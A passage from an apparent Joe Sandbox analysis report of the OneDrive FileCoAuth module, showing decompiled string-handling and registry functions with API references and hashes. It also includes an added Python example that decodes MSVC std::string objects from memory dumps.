    Instruction addresses (one per decompiled statement, in listing order): 0x00e9404d, 0x00e9404d, 0x00e94055, 0x00e9405c, 0x00e9405f, 0x00e94063, 0x00e94067, 0x00e9406c, 0x00e94078, 0x00e9407b, 0x00e9407e, 0x00e94081, 0x00e9408f, 0x00e94091, 0x00e94096, 0x00e940a0, 0x00e940a2, 0x00e940a2, 0x00e940a7, 0x00e940b3, 0x00e940ba, 0x00e940bd, 0x00e940c5, 0x00e940c7, 0x00e940cc, 0x00e940d6, 0x00e940d8, 0x00e940d8, 0x00e940dd, 0x00e940e9, 0x00e940f0, 0x00e940f7, 0x00e940fe, 0x00e940ff, 0x00e94104, 0x00e94104, 0x00e940f0, 0x00e94109, 0x00e9410e, 0x00e94113, 0x00e94113, 0x00e94118, 0x00e94118, 0x00e94128

    APIs
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?), ref: 00E94096
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?,?,00000001,00000000), ref: 00E940CC
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E940F7
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FromInfoPrivateString@@StripU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri
    • API String ID: 969308733-2814660012
    • Opcode ID: 785a306c01c40e5d388b5465217b9b20d992d3229f0ed39a4da2fcb35054e805
    • Instruction ID: ddb49f885d4efaf0759983cd4e28c676182e00f2487a928ae3c3d92c38ed233a
    • Opcode Fuzzy Hash: 785a306c01c40e5d388b5465217b9b20d992d3229f0ed39a4da2fcb35054e805
    • Instruction Fuzzy Hash: 70219CB2601218AFDF10DBA5CC89FAABBB8EF59711F001159F905BB191DB31ED41CBA0
    Uniqueness Score: -1,00%

    C-Code - Quality: 75%
    			E00E98198(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
    				void* __ebx;
    				void* __edi;
    				signed int _t17;
    				intOrPtr _t26;
    				intOrPtr* _t27;
    				signed int _t30;
    				intOrPtr _t33;
    				intOrPtr _t35;
    				signed int _t36;
    				void* _t42;
    
    				_t39 = _a4;
    				_t42 = __ecx;
    				_t17 = E00E94ABF(__ecx, _a4);
    				if(_t17 == 0) {
    					_t33 =  *((intOrPtr*)(__ecx + 0x10));
    					_t30 = _a8;
    					if((_t17 | 0xffffffff) - _t33 <= _t30) {
    						__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
    					}
    					if(_t30 != 0) {
    						_a8 = _t33 + _t30;
    						if(E00E94D8F(_t30, _t42, _t39, _t33 + _t30, 0) != 0) {
    							if( *((intOrPtr*)(_t42 + 0x14)) < 8) {
    								_t35 = _t42;
    							} else {
    								_t35 =  *_t42;
    							}
    							E00E942E3(_t35 +  *(_t42 + 0x10) * 2, _t39, _t30);
    							_t36 = _a8;
    							 *(_t42 + 0x10) = _t36;
    							if( *((intOrPtr*)(_t42 + 0x14)) < 8) {
    								_t26 = _t42;
    							} else {
    								_t26 =  *_t42;
    							}
    							 *((short*)(_t26 + _t36 * 2)) = 0;
    						}
    					}
    					return _t42;
    				}
    				if( *((intOrPtr*)(__ecx + 0x14)) < 8) {
    					_t27 = __ecx;
    				} else {
    					_t27 =  *__ecx;
    				}
    				return E00E95904(_t42, _t42, _t39 - _t27 >> 1, _a8);
    			}


    Instruction addresses (one per decompiled statement, in listing order; 0x00000000 = no address): 0x00e9819f, 0x00e981a2, 0x00e981a5, 0x00e981ac, 0x00e981cc, 0x00e981d3, 0x00e981da, 0x00e981e1, 0x00e981e1, 0x00e981e9, 0x00e981f3, 0x00e981fd, 0x00e98203, 0x00e98209, 0x00e98205, 0x00e98205, 0x00e98205, 0x00e98214, 0x00e98219, 0x00e98223, 0x00e98226, 0x00e9822c, 0x00e98228, 0x00e98228, 0x00e98228, 0x00e98230, 0x00e98230, 0x00e981fd, 0x00000000, 0x00e98236, 0x00e981b2, 0x00e981b8, 0x00e981b4, 0x00e981b4, 0x00e981b4, 0x00000000

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@
    • String ID: Last known error: $string too long
    • API String ID: 1004598685-548090674
    • Opcode ID: 5c83be984a61b532799070fc5ea6c99b901328388afc7057510bf4c25a87739d
    • Instruction ID: 1f603c2f61501cdd1725475097cae5e36751b3d6dc3f283b0106abdc284e5b22
    • Opcode Fuzzy Hash: 5c83be984a61b532799070fc5ea6c99b901328388afc7057510bf4c25a87739d
    • Instruction Fuzzy Hash: 4011D2713016049BCF34CF6ADD449AA77E9EF83B50710152DF456AB2A0DF30A90AC790
    Uniqueness Score: -1,00%

    C-Code - Quality: 75%
    			E00E93157(void* __ecx, intOrPtr* _a4, intOrPtr _a8, void _a12) {
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t13;
    				void* _t16;
    				intOrPtr* _t24;
    				void* _t26;
    				intOrPtr _t28;
    				int _t30;
    				void* _t31;
    
    				_t25 = __ecx;
    				_t13 = _a8;
    				_t24 = _a4;
    				_t31 = __ecx;
    				_t28 =  *((intOrPtr*)(_t24 + 0x10));
    				if(_t28 < _t13) {
    					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
    				}
    				_t30 =  <  ? _a12 : _t28 - _t13;
    				if(_t31 != _t24) {
    					if(E00E935F4(_t24, _t25, _t30, _t30, 0) != 0) {
    						if( *((intOrPtr*)(_t24 + 0x14)) >= 0x10) {
    							_t24 =  *_t24;
    						}
    						if( *((intOrPtr*)(_t31 + 0x14)) < 0x10) {
    							_t26 = _t31;
    						} else {
    							_t26 =  *_t31;
    						}
    						if(_t30 != 0) {
    							memcpy(_t26, _a8 + _t24, _t30);
    						}
    						 *(_t31 + 0x10) = _t30;
    						if( *((intOrPtr*)(_t31 + 0x14)) < 0x10) {
    							_t16 = _t31;
    						} else {
    							_t16 =  *_t31;
    						}
    						 *((char*)(_t16 + _t30)) = 0;
    					}
    				} else {
    					E00E9353E(_t25, _t13 + _t30);
    					E00E9356F(_t31, 0, _a8);
    				}
    				return _t31;
    			}


    Instruction addresses (one per decompiled statement, in listing order): 0x00e93157, 0x00e9315c, 0x00e93160, 0x00e93165, 0x00e93167, 0x00e9316c, 0x00e93173, 0x00e93173, 0x00e9317e, 0x00e93184, 0x00e931a7, 0x00e931ad, 0x00e931af, 0x00e931af, 0x00e931b5, 0x00e931bb, 0x00e931b7, 0x00e931b7, 0x00e931b7, 0x00e931bf, 0x00e931c9, 0x00e931ce, 0x00e931d5, 0x00e931d8, 0x00e931de, 0x00e931da, 0x00e931da, 0x00e931da, 0x00e931e0, 0x00e931e0, 0x00e93186, 0x00e93189, 0x00e93196, 0x00e93196, 0x00e931ea

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00E934F3,?,?,?,?,?,?,?,00E92EA7,?,00000000), ref: 00E93173
      • Part of subcall function 00E935F4: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,00E93503,?,00000000,?,?,?,?,?,00E92EA7,?,00000000), ref: 00E93607
    • memcpy.MSVCR120 ref: 00E931C9
    Strings
    • invalid string position, xrefs: 00E9316E
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
    • String ID: invalid string position
    • API String ID: 4248180022-1799206989
    • Opcode ID: 891686db9e852419f835bedb9ca5e71bb6492508e3fd6f670cdbeb6ca1544ff6
    • Instruction ID: f6f1cae3bbd832beff37365ceb06f08db9bb60ad626156e85723e9c6577f043b
    • Opcode Fuzzy Hash: 891686db9e852419f835bedb9ca5e71bb6492508e3fd6f670cdbeb6ca1544ff6
    • Instruction Fuzzy Hash: DE11A3723013009BDF349E3EDC80A6BB7EAEB85755B11142AF856AB251CB71EF4487A1
    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00E9356F(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr* _t16;
    				int _t18;
    				intOrPtr* _t19;
    				intOrPtr* _t22;
    				void* _t24;
    				intOrPtr _t27;
    				intOrPtr _t28;
    				intOrPtr _t30;
    				intOrPtr _t32;
    				intOrPtr* _t33;
    
    				_t33 = __ecx;
    				_t27 = _a4;
    				_t30 =  *((intOrPtr*)(__ecx + 0x10));
    				if(_t30 < _t27) {
    					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
    				}
    				_t28 = _a8;
    				if(_t30 - _t27 > _t28) {
    					if(_t28 != 0) {
    						if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
    							_t16 = _t33;
    						} else {
    							_t16 =  *_t33;
    						}
    						_t32 = _t30 - _t28;
    						_t24 = _t16 + _t27;
    						_t18 = _t32 - _t27;
    						if(_t18 != 0) {
    							memmove(_t24, _t24 + _t28, _t18);
    						}
    						 *((intOrPtr*)(_t33 + 0x10)) = _t32;
    						if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
    							_t19 = _t33;
    						} else {
    							_t19 =  *_t33;
    						}
    						 *((char*)(_t19 + _t32)) = 0;
    					}
    				} else {
    					 *((intOrPtr*)(_t33 + 0x10)) = _t27;
    					if( *((intOrPtr*)(_t33 + 0x14)) < 0x10) {
    						_t22 = _t33;
    					} else {
    						_t22 =  *_t33;
    					}
    					 *((char*)(_t22 + _t27)) = 0;
    				}
    				return _t33;
    			}


    Instruction addresses (one per decompiled statement, in listing order): 0x00e93575, 0x00e93577, 0x00e9357b, 0x00e93580, 0x00e93587, 0x00e93587, 0x00e9358d, 0x00e93596, 0x00e935af, 0x00e935b5, 0x00e935bb, 0x00e935b7, 0x00e935b7, 0x00e935b7, 0x00e935bd, 0x00e935c0, 0x00e935c5, 0x00e935c7, 0x00e935cf, 0x00e935d5, 0x00e935dc, 0x00e935e0, 0x00e935e6, 0x00e935e2, 0x00e935e2, 0x00e935e2, 0x00e935e8, 0x00e935e8, 0x00e93598, 0x00e9359c, 0x00e9359f, 0x00e935a5, 0x00e935a1, 0x00e935a1, 0x00e935a1, 0x00e935a7, 0x00e935a7, 0x00e935f1

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00E9319B,00000000,?,?,?,?,?,?,00E934F3,?,?,?), ref: 00E93587
    • memmove.MSVCR120 ref: 00E935CF
    Strings
    • invalid string position, xrefs: 00E93582
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xout_of_range@std@@memmove
    • String ID: invalid string position
    • API String ID: 1894236298-1799206989
    • Opcode ID: 81b67b00ff3ed6cd4954fe0e01d4c6ed96b32b3c8acd4cdb8f56026c2790776e
    • Instruction ID: f2e098cfdbb0bc1391a93c1642023f3cd9fcc4f6295be75163214dd53e36e2fe
    • Opcode Fuzzy Hash: 81b67b00ff3ed6cd4954fe0e01d4c6ed96b32b3c8acd4cdb8f56026c2790776e
    • Instruction Fuzzy Hash: D7118E31304241AFDB348E2CD844956B7F9EB8A701716592FE482EB651DBB1EA44CBA1
    Uniqueness Score: -1,00%

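The `_Myres` test that recurs through these listings (`if (*(p + 0x14) >= 8) p = *p;` in E00E93F0C, E00E9404D, E00EA21C0 and E00E98198, and the `< 0x10` form in E00E93157 and E00E9356F) is the MSVC 2013 (MSVCP120) small-string optimisation of `std::basic_string` on x86: the object is 0x18 bytes, with a 16-byte union at offset 0 that holds either the text itself or a pointer to a heap buffer, `_Mysize` at 0x10 and `_Myres` at 0x14; the text is inline while `_Myres` is below 16 for `char` or below 8 for `wchar_t`. The Python below is an added example, not part of the Joe Sandbox report or of the analysed module; it decodes such objects from raw dump bytes the way the decompiled code reads them, and refuses objects whose size exceeds their capacity or whose heap pointer is not mapped. The addresses, capacities and text in the sample dump are constructed.

```python
import struct

# Byte size of a 32-bit MSVC 2013 std::basic_string object: 16-byte _Bx union,
# then _Mysize and _Myres (4 bytes each), as read at +0x10 and +0x14 above.
STRING_OBJECT_SIZE = 0x18


class DumpMemory:
    """Minimal read-only view over dumped regions, keyed by base address."""

    def __init__(self, regions):
        self.regions = dict(regions)          # {base_address: bytes}

    def read(self, addr, size):
        for base, data in self.regions.items():
            if base <= addr and addr + size <= base + len(data):
                off = addr - base
                return data[off:off + size]
        raise ValueError(f"unmapped read at {addr:#x} (+{size:#x})")


def decode_msvc12_string(mem, obj_addr, wide):
    """Decode a std::string (wide=False) or std::wstring (wide=True).

    Mirrors the decompiled check: if _Myres (offset 0x14) is below the
    inline-buffer capacity (16 chars for char, 8 for wchar_t) the text lives
    in the object itself; otherwise offset 0 holds a pointer to a heap buffer.
    """
    char_size = 2 if wide else 1
    inline_chars = 16 // char_size
    raw = mem.read(obj_addr, STRING_OBJECT_SIZE)
    bx = raw[:16]
    size, res = struct.unpack_from("<II", raw, 0x10)
    if size > res:
        raise ValueError(f"corrupt string at {obj_addr:#x}: _Mysize {size} > _Myres {res}")
    if res < inline_chars:
        data, heap_ptr = bx[:size * char_size], None
    else:
        (heap_ptr,) = struct.unpack_from("<I", bx, 0)
        data = mem.read(heap_ptr, size * char_size)
    text = data.decode("utf-16-le" if wide else "latin-1")
    return {"text": text, "size": size, "reserve": res, "heap_ptr": heap_ptr}


def is_plausible_string(mem, obj_addr, wide):
    """True when obj_addr decodes as a consistent, fully mapped string object."""
    try:
        decode_msvc12_string(mem, obj_addr, wide)
        return True
    except ValueError:
        return False


# --- constructed sample dump (addresses, text and capacities are made up) ---

def _wide_inline_object(text):
    """wstring short enough for the inline buffer (at most 7 chars plus NUL)."""
    buf = text.encode("utf-16-le").ljust(16, b"\0")
    return buf + struct.pack("<II", len(text), 7)


def _char_heap_object(text, heap_addr):
    """string too long for the inline buffer: _Bx holds a heap pointer."""
    reserve = len(text) + 8                  # any value >= len(text) and >= 16
    return struct.pack("<I", heap_addr).ljust(16, b"\0") + struct.pack("<II", len(text), reserve)


STACK_BASE = 0x0019FF00
HEAP_BASE = 0x00C40000
HEAP_TEXT = "SyncEngineFileInfoProvider::GetPropertyHandlerFromPath"
SAMPLE_DUMP = DumpMemory({
    STACK_BASE: _wide_inline_object("path") + _char_heap_object(HEAP_TEXT, HEAP_BASE),
    HEAP_BASE: HEAP_TEXT.encode("ascii") + b"\0",
})

if __name__ == "__main__":
    print(decode_msvc12_string(SAMPLE_DUMP, STACK_BASE, wide=True))
    print(decode_msvc12_string(SAMPLE_DUMP, STACK_BASE + STRING_OBJECT_SIZE, wide=False))
```

Applied to the `.sdmp` regions listed under Memory Dump Source, the decoder turns the string objects the listings only reach through `_t40` or `_t51` into readable text. It handles the x86 layout only; the x64 build of the same library keeps the 16-byte union but widens the pointer to 8 bytes and places `_Myres` at 0x18, so the offsets above would have to change.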
    C-Code - Quality: 74%
    			E00E9235A(void* __ebx, void** __ecx, void* _a4, short* _a8, char _a12) {
    				signed int _v8;
    				void* _v12;
    				void* __edi;
    				void* __esi;
    				signed int _t14;
    				void* _t16;
    				long _t17;
    				long _t21;
    				void* _t22;
    				long _t26;
    				short* _t29;
    				int _t31;
    				void* _t32;
    				void** _t36;
    				void* _t37;
    				signed int _t38;
    
    				_t22 = __ebx;
    				_push(__ecx);
    				_push(__ecx);
    				_t14 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t14 ^ _t38;
    				_v12 = _v12 & 0x00000000;
    				_t16 = _a4;
    				_t29 = _a8;
    				_t36 = __ecx;
    				_t24 =  *((intOrPtr*)(__ecx + 8));
    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
    					_t9 =  &_a12; // 0xe92729
    					_t31 =  *_t9;
    					_t17 = RegOpenKeyExW(_t16, _t29, 0, _t31,  &_v12);
    				} else {
    					_t8 =  &_a12; // 0xe92729
    					_t31 =  *_t8;
    					_t17 = E00E91F10(_t24, _t16, _t29, _t24, _t31,  &_v12);
    				}
    				_t26 = _t17;
    				if(_t26 == 0) {
    					if( *_t36 != _t26) {
    						_t21 = RegCloseKey( *_t36);
    						 *_t36 =  *_t36 & 0x00000000;
    						_t26 = _t21;
    					}
    					 *_t36 = _v12;
    					_t36[1] = _t31 & 0x00000300;
    				}
    				_pop(_t32);
    				_pop(_t37);
    				return E00EA29F2(_t22, _v8 ^ _t38, _t29, _t32, _t37);
    			}


    Instruction addresses (one per decompiled statement, in listing order): 0x00e9235a, 0x00e9235f, 0x00e92360, 0x00e92361, 0x00e92368, 0x00e9236b, 0x00e9236f, 0x00e92372, 0x00e92376, 0x00e92379, 0x00e9237e, 0x00e92392, 0x00e92392, 0x00e9239e, 0x00e92380, 0x00e92384, 0x00e92384, 0x00e9238b, 0x00e9238b, 0x00e923a4, 0x00e923a8, 0x00e923ac, 0x00e923b0, 0x00e923b6, 0x00e923b9, 0x00e923b9, 0x00e923c4, 0x00e923c6, 0x00e923c6, 0x00e923ce, 0x00e923d1, 0x00e923da

    APIs
    • RegOpenKeyExW.ADVAPI32(00000000,80000000,00000000,)',00000000,?,?,?,?,?,00E92729,80000000), ref: 00E9239E
    • RegCloseKey.ADVAPI32(?,?,00E92729,80000000), ref: 00E923B0
      • Part of subcall function 00E91F10: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F24
      • Part of subcall function 00E91F10: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00E91F34
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressCloseHandleModuleOpenProc
    • String ID: )'
    • API String ID: 823179699-2759736101
    • Opcode ID: a785ec0d88edad24a7e7c389e17753c63d083fbdd5f27076b37614471ff2333f
    • Instruction ID: d50a4cd91d5e9dff60066f17daf448748aa9e31f5902e3a2c9ef3230031059e7
    • Opcode Fuzzy Hash: a785ec0d88edad24a7e7c389e17753c63d083fbdd5f27076b37614471ff2333f
    • Instruction Fuzzy Hash: 0E117C3260120ABFDF28CF59C855FAFB7F9EF85711F10456DB546A7240DA74A9408B50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 73%
    			E00E9823D(void* __ebx, intOrPtr* __ecx, long __edx) {
    				signed int _v8;
    				short _v12;
    				void* __edi;
    				void* __esi;
    				signed int _t8;
    				long _t12;
    				void* _t18;
    				void* _t28;
    				intOrPtr* _t31;
    				void* _t32;
    				signed int _t33;
    
    				_t27 = __edx;
    				_t18 = __ebx;
    				_push(__ecx);
    				_push(__ecx);
    				_t8 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t8 ^ _t33;
    				_t31 = __ecx;
    				if(__edx != 0) {
    					_v12 = 0;
    					_t12 = FormatMessageW(0x1100, 0, __edx, 0x400,  &_v12, 0, 0);
    					_t35 = _t12;
    					if(_t12 != 0) {
    						E00E98198(_t31, _t35, L"\nLast known error: ", E00E94E74(L"\nLast known error: "));
    						E00E98198(_t31, _t35, _v12, E00E94E74(_v12));
    						LocalFree(_v12);
    						_t28 = _t28;
    					}
    				}
    				_pop(_t32);
    				return E00EA29F2(_t18, _v8 ^ _t33, _t27, _t28, _t32);
    			}

    APIs
    • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,?,?,?,00E983E9), ref: 00E9826C
      • Part of subcall function 00E98198: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
    • LocalFree.KERNEL32(?,?,00000000,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E982A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FormatFreeLocalMessageXlength_error@std@@
    • String ID: Last known error:
    • API String ID: 1980279784-3866509481
    • Opcode ID: 4ebf1fe5667e14350e9e4b556d786c6f1a91a447f440cc83e4e6f6dcf22d068d
    • Instruction ID: b555134bba047017ef17c7f17b847c886a38599230e1fa63ea0d256ddb97a3fd
    • Opcode Fuzzy Hash: 4ebf1fe5667e14350e9e4b556d786c6f1a91a447f440cc83e4e6f6dcf22d068d
    • Instruction Fuzzy Hash: E401D6B1A00108BFAF086B5ADC06DBFBBBDEF9A710F04016EF505B61A1DFB16E418564
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 83%
    			E00E92F7A(void* __eflags) {
    				void* _t4;
    				long _t6;
    				intOrPtr _t7;
    				signed int _t10;
    				intOrPtr _t13;
    				intOrPtr* _t19;
    
    				 *0xeb2328 = 0xeb17e8;
    				_t10 = 6;
    				_t4 = memset(0xeb17f8, 0, _t10 << 2);
    				 *0xeb17ec = _t4;
    				 *0xeb17f4 = _t4;
    				 *0xeb17f0 = _t4;
    				 *0xeb1810 = _t4;
    				if(E00E91E96(_t4, 0xeb17f8) >= 0) {
    					 *0xeb17ec = 0x24;
    				} else {
    					 *0xeb2314 = 1;
    				}
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				_t6 = GetCurrentThreadId();
    				 *0xeb1818 =  *0xeb1818 & 0x00000000;
    				_t19 =  *0xeb2378; // 0xeadba0
    				_t13 =  *0xeb237c; // 0xeadba4
    				 *0xeb1814 = _t6;
    				 *0xeb181c = 0x1388;
    				 *0xeb1820 = 0x3e8;
    				 *0xeb1824 = 1;
    				 *0xeb1826 = 0;
    				while(_t19 < _t13) {
    					_t7 =  *_t19;
    					if(_t7 != 0) {
    						 *((intOrPtr*)(_t7 + 0x1c))(1);
    						_t13 =  *0xeb237c; // 0xeadba4
    					}
    					_t19 = _t19 + 4;
    				}
    				return 0xeb17e8;
    			}

    APIs
      • Part of subcall function 00E91E96: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91E9E
      • Part of subcall function 00E91E96: GetLastError.KERNEL32(?,00000000,00000000,?,8007000E), ref: 00E91EA8
    • GetCurrentThreadId.KERNEL32 ref: 00E92FD6
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalCurrentErrorInitializeLastSectionThread
    • String ID: ,v$dv
    • API String ID: 2717818847-3304515013
    • Opcode ID: 3073b20ff4e790cf951469ec5587e493b40579962cabeaeb26b66490d33cf5ea
    • Instruction ID: ed6b4d84a4f01c4ac0fb98eb14ab19b70b8d18f84ff666ac66e4a5357153455a
    • Opcode Fuzzy Hash: 3073b20ff4e790cf951469ec5587e493b40579962cabeaeb26b66490d33cf5ea
    • Instruction Fuzzy Hash: 9B119131504391CFDB15CF2AF8147473AE5AB8A324F9452BE9904BB360CB754848CB91
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 94%
    			E00E9F38F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t26;
    				signed int _t30;
    				void* _t38;
    
    				_t37 = __esi;
    				_t36 = __edi;
    				_push(0x38);
    				E00EA3194(E00EA4D3D, __ebx, __edi, __esi);
    				_t30 = 0;
    				if(E00EA138F() == 0 || E00EA13B2(__edx) != 0) {
    					L4:
    					_t30 = 1;
    				} else {
    					 *((intOrPtr*)(_t38 - 0x44)) = 0;
    					E00E94E9D(_t38 - 0x40, L"EnableDownlevelInstallOnBluePlus");
    					 *(_t38 - 4) = 0;
    					E00E94E9D(_t38 - 0x28, L"Software\\Microsoft\\OneDrive");
    					 *(_t38 - 4) = 1;
    					_t26 = E00E9F1E6(_t38 - 0x28, 0x80000001, _t38 - 0x28, _t38 - 0x40, 0, _t38 - 0x44);
    					_t37 = _t26;
    					 *(_t38 - 4) = 0;
    					E00E94307(_t38 - 0x28, 1, 0);
    					 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
    					E00E94307(_t38 - 0x40, 1, 0);
    					if(_t26 >= 0 &&  *((intOrPtr*)(_t38 - 0x44)) != 0) {
    						goto L4;
    					}
    				}
    				return E00EA3152(_t30, _t36, _t37);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9F396
      • Part of subcall function 00EA13B2: memset.MSVCR120 ref: 00EA1403
      • Part of subcall function 00EA13B2: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001), ref: 00EA1421
      • Part of subcall function 00EA13B2: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 00EA1431
      • Part of subcall function 00E9F1E6: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000008), ref: 00E9F215
      • Part of subcall function 00E9F1E6: RegQueryValueExW.ADVAPI32(00000008,?,00000000,?,?,00000004), ref: 00E9F252
      • Part of subcall function 00E9F1E6: RegCloseKey.ADVAPI32(00000008), ref: 00E9F280
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    Strings
    • EnableDownlevelInstallOnBluePlus, xrefs: 00E9F3AF
    • Software\Microsoft\OneDrive, xrefs: 00E9F3C5
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseConditionH_prolog3_InfoMaskOpenQueryValueVerifyVersionmemset
    • String ID: EnableDownlevelInstallOnBluePlus$Software\Microsoft\OneDrive
    • API String ID: 2556130898-1504303525
    • Opcode ID: 1c6b2eee37ad255de326c8da0a021dfc21d0efa922a027aac445fb2d7bab2e17
    • Instruction ID: 8e580e8d1b00681abe3fffe456f63f6db550698c5ccaf28242f191789f9ab9f2
    • Opcode Fuzzy Hash: 1c6b2eee37ad255de326c8da0a021dfc21d0efa922a027aac445fb2d7bab2e17
    • Instruction Fuzzy Hash: 4E0192719012089ECF00EFE08942EEDB7B8AF1A308F542569E511BB1C2DA706F4AC761
    Uniqueness

